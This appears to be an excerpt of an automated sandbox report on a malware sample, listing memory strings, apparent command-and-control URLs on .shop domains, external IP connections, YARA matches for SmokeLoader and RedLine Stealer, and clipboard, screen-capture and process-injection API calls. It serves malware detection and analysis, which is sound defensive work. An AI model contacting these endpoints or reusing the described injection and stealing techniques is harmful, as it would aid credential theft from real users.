Source: BitLockerToGo.exe, 00000009.00000003.3007071039.000000000331C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop/
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop/G
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop/I
Source: BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop/api
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop/apip
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tenntysjuxmz.shop:443/apifiles/76561199724331900
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1857879944.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1857879944.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writerospzm.shop//
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writerospzm.shop/api
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1854160723.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: BitLockerToGo.exe, 00000009.00000003.3021005746.0000000003326000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3007071039.0000000003326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.231:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.204.20:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.14.101:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 9_2_00E51E90 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00E51E90

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 9_2_00E51E90 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

9_2_00E51E90

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 9_2_00E52A9A GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

9_2_00E52A9A

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2175200910.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1869071575.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1868841024.00000000005CA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1868741876.0000000000590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2175323602.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2923398094.000000C000F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000005.00000002.2175430377.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1868969005.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2175219428.00000000006A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401513
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	0_2_00402FD3
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_0040267C NtEnumerateKey,	0_2_0040267C
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020C4 LocalAlloc,NtQuerySystemInformation,	0_2_004020C4
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020E3 LocalAlloc,NtQuerySystemInformation,	0_2_004020E3
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020E7 LocalAlloc,NtQuerySystemInformation,	0_2_004020E7
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020FC LocalAlloc,NtQuerySystemInformation,	0_2_004020FC
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020B6 LocalAlloc,NtQuerySystemInformation,	0_2_004020B6
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004020B8 LocalAlloc,NtQuerySystemInformation,	0_2_004020B8
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00403149 RtlCreateUserThread,NtTerminateProcess,	0_2_00403149
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,towlower,	0_2_00403303
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040151E
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004025DD NtOpenKey,	0_2_004025DD
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00401513 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401513
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00402FD3 RtlCreateUserThread,NtTerminateProcess,	5_2_00402FD3
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_0040267C NtEnumerateKey,	5_2_0040267C
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020C4 LocalAlloc,NtQuerySystemInformation,	5_2_004020C4
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020E3 LocalAlloc,NtQuerySystemInformation,	5_2_004020E3
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020E7 LocalAlloc,NtQuerySystemInformation,	5_2_004020E7
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020FC LocalAlloc,NtQuerySystemInformation,	5_2_004020FC
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020B6 LocalAlloc,NtQuerySystemInformation,	5_2_004020B6
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004020B8 LocalAlloc,NtQuerySystemInformation,	5_2_004020B8
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00403149 RtlCreateUserThread,NtTerminateProcess,	5_2_00403149
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401553
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00403303 NtTerminateProcess,GetModuleHandleA,CreateFileW,GetForegroundWindow,wcsstr,	5_2_00403303
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_0040151E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040151E
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004025DD NtOpenKey,	5_2_004025DD

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00424D4B	0_2_00424D4B
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00426C2C	0_2_00426C2C
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004257D3	0_2_004257D3
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_0042528F	0_2_0042528F
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00424D4B	5_2_00424D4B
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00426C2C	5_2_00426C2C
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004257D3	5_2_004257D3
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_0042528F	5_2_0042528F
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DED64A0	6_2_00007FF69DED64A0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB9E90	6_2_00007FF69DDB9E90
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC2A70	6_2_00007FF69DDC2A70
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DED6020	6_2_00007FF69DED6020
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DED6220	6_2_00007FF69DED6220
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBBFE0	6_2_00007FF69DDBBFE0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC27F0	6_2_00007FF69DDC27F0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBAFF0	6_2_00007FF69DDBAFF0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB93C0	6_2_00007FF69DDB93C0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBA7C0	6_2_00007FF69DDBA7C0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC3D80	6_2_00007FF69DDC3D80
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB9550	6_2_00007FF69DDB9550
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBBB20	6_2_00007FF69DDBBB20
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBF720	6_2_00007FF69DDBF720
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDE7F20	6_2_00007FF69DDE7F20
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBC930	6_2_00007FF69DDBC930
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC3930	6_2_00007FF69DDC3930
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBD900	6_2_00007FF69DDBD900
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC3310	6_2_00007FF69DDC3310
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE15F00	6_2_00007FF69DE15F00
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB50E0	6_2_00007FF69DDB50E0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBC4E0	6_2_00007FF69DDBC4E0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB50DF	6_2_00007FF69DDB50DF
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC72F0	6_2_00007FF69DDC72F0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDFDCF0	6_2_00007FF69DDFDCF0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDE84C0	6_2_00007FF69DDE84C0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE460D0	6_2_00007FF69DE460D0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE166D0	6_2_00007FF69DE166D0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB98D0	6_2_00007FF69DDB98D0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC1AD0	6_2_00007FF69DDC1AD0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC5AC9	6_2_00007FF69DDC5AC9
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE542C0	6_2_00007FF69DE542C0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB4CA0	6_2_00007FF69DDB4CA0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBEAA0	6_2_00007FF69DDBEAA0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBF8B0	6_2_00007FF69DDBF8B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC16B0	6_2_00007FF69DDC16B0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC4C80	6_2_00007FF69DDC4C80
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB8A80	6_2_00007FF69DDB8A80
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC6A80	6_2_00007FF69DDC6A80
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC8880	6_2_00007FF69DDC8880
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDCA280	6_2_00007FF69DDCA280
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB2C90	6_2_00007FF69DDB2C90
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBBC90	6_2_00007FF69DDBBC90
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBE090	6_2_00007FF69DDBE090
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDFD290	6_2_00007FF69DDFD290
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE00090	6_2_00007FF69DE00090
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBD460	6_2_00007FF69DDBD460
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDE9E60	6_2_00007FF69DDE9E60
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE00A60	6_2_00007FF69DE00A60
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE16270	6_2_00007FF69DE16270
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC0040	6_2_00007FF69DDC0040
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB343A	6_2_00007FF69DDB343A
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE15C40	6_2_00007FF69DE15C40
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB9C20	6_2_00007FF69DDB9C20
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DE48E30	6_2_00007FF69DE48E30
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC0830	6_2_00007FF69DDC0830
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBFC30	6_2_00007FF69DDBFC30
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDFE830	6_2_00007FF69DDFE830
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC8C30	6_2_00007FF69DDC8C30
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC6600	6_2_00007FF69DDC6600
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDFDA00	6_2_00007FF69DDFDA00
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DED4E10	6_2_00007FF69DED4E10
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDBD010	6_2_00007FF69DDBD010
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDE8010	6_2_00007FF69DDE8010
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB25E0	6_2_00007FF69DDB25E0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB37E0	6_2_00007FF69DDB37E0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC1DE0	6_2_00007FF69DDC1DE0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC4FF0	6_2_00007FF69DDC4FF0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDC75C0	6_2_00007FF69DDC75C0
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB83D0	6_2_00007FF69DDB83D0
